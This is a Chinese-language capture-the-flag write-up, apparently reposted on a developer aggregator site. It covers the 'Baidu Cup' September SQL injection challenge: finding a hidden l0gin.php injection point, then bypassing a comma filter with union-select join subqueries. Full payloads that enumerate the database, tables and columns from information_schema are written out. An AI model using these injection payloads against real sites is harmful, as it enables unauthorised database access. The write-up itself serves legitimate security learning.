“百度杯”CTF比赛 九月场SQLi ---------mozhe

题目链接：https://www.ichunqiu.com/battalion

点击进去，查看源代码

 发现login.php?id=1

一般是存在sql注入的，可是我测试了好几遍，sqlmap也跑过了，也没发现啥

没办法，查看了官方wp，说是存在index.php，并在其header头有真正的注入点

在index.php请求进行301重定向，明显发现上面的链接只差一个字母，我的是直接看到注入点l0gin.php?id=1。不能直接看到的要在header请求b68a89d1c4a097a9d863lb3ac45e8979.php

来到正确的注入页面

发现一个部分的表图 ，从表的结构可以知道字段为2

单引号检测，直接查询报错

那就 ' order by 1,2#

直接过滤了逗号后面的语句，并且id回显的是过滤后的语句

百度一波，逗号绕过注入

join 绕过

构造语句：1'  union select * from (select 1) a join (select 2 ) b %23

发现回显正常，照上面分析，id会回显过滤后的sql语句（1'  union select * from (select 1) a join (select 2 ) b %23）才对

这里没有回显，说明注入语句执行成功，因为是联合查询，union 前后的两个注入语句都是执行成功的。而这里第一个执行的结果输出了，以致第二个sql查询结果无法显示出来。

那我们可以让第一个结果执行为空，第二个就可以显示出来了

id=3的时候，username是空的

直接构造语句：3'  union select * from (select 1) a join (select 2 ) b %23

正常回显查询的字段

现在查询数据库

3'  union select * from (select 1) a join (select database() ) b %23

查询表

3'  union select * from (select 1) a join (select table_name from information_schema.tables where table_schema='sqli' ) b %23

得到user表（不贴图）

查询列

3'  union select * from (select 1) a join (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users'  ) b #

(这里连接字符函数换成limit也可以，不过照样的绕过逗号)

查询字段

get flag

最后

以上就是轻松冰淇淋为你收集整理的“百度杯”CTF比赛 九月场SQLi ---------mozhe的全部内容，希望文章能够帮你解决“百度杯”CTF比赛 九月场SQLi ---------mozhe所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。